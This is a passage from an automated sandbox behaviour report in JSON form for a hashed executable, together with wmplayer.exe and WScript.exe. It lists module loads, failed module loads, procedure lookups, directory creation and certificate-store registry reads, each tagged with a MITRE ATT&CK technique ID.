\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter gdiplus.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter C:\\ntdll.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter rasapi32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter ws2_32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter RASMAN.DLL (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter rtutils.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter NSI.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter CFGMGR32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\en-US\\tzres.dll.mui (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter iphlpapi.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter secur32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter ncrypt.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter crypt32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter CRYPT32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter USERENV.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005796)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wmploc.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter wmp.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter wmploc.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter COMCTL32.DLL (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter COMCTL32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter SETUPAPI.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter CFGMGR32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter MFPlat.DLL (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter WMPLOC.DLL (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter samcli.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter netutils.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter WINMM.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter WTSAPI32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter WINSTA.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter WindowsCodecs.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter IMM32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\FirewallAPI.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter MF.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter %PROGRAMFILES%\\Windows Media Player\\wmplayer.exe (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wmp.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\kernel32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter MSIMG32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter WININET.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter wmerror.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter WINTRUST.dll (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00002988)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\advapi32.dll (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter WINTRUST.dll (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\msxml3r.dll (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004824)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004824)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"C:\\ntdll.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll\" - [base:0; Status:c0000135]\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll\" - [base:0; Status:c0000135]\n \"wmplayer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"wmplayer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WScript.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WScript.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76270000\n \"wmplayer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76270000\n \"WScript.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76270000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e00844b9b6a@IPHLPAPI.DLL\"\n \"0f001000dc4b9b6a@IPHLPAPI.DLL\"\n \"0c000d00244c9b6a@IPHLPAPI.DLL\"\n \"140015006c4c9b6a@IPHLPAPI.DLL\"\n \"0c000d00e04c9b6a@IPHLPAPI.DLL\"\n \"15001600c03e9b6a@ADVAPI32.dll\"\n \"0e000f00703f9b6a@ADVAPI32.dll\"\n \"0e000f00cc3f9b6a@ADVAPI32.dll\"\n \"11001200b4479b6a@ADVAPI32.dll\"\n \"1100120048489b6a@ADVAPI32.dll\"\n \"120013008c489b6a@ADVAPI32.dll\"\n \"12001300e4489b6a@ADVAPI32.dll\"\n \"14001500386e9b6a@ADVAPI32.dll\"\n \"14001500506e9b6a@ADVAPI32.dll\"\n \"14001500686e9b6a@ADVAPI32.dll\"\n \"17001800806e9b6a@ADVAPI32.dll\"\n \"0d000e00986e9b6a@ADVAPI32.dll\"\n \"11001200a86e9b6a@ADVAPI32.dll\"\n \"11001200bc6e9b6a@ADVAPI32.dll\"\n \"0d000e0034499b6a@shell32.dll\"\n \"0d000e00b0499b6a@shell32.dll\"\n \"10001100c46f9b6a@CRYPT32.dll\"\n \"12001300e86f9b6a@CRYPT32.dll\"\n \"0f001000fc6f9b6a@ADVAPI32.dll\"\n \"140015000c709b6a@CRYPT32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-17", "type": 3, "relevance": 10, "name": "Accesses System Certificates Settings", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE\"; Key: \"DISALLOWEDCERTSYNCDELTATIME\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\MY\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\2E4916B07F3DE90C8DDE2566FD9B9B400D89BBBA\"; Key: \"BLOB\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\5AEAEE3F7F2A9449CEBAFEEC68FDD184F20124A7\"; Key: \"BLOB\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\E6A3B45B062D509B3382282D196EFE97D5956CCB\"; Key: \"BLOB\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\F5AD0BCC1AD56CD150725B1C866C30AD92EF21B0\"; Key: \"BLOB\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n 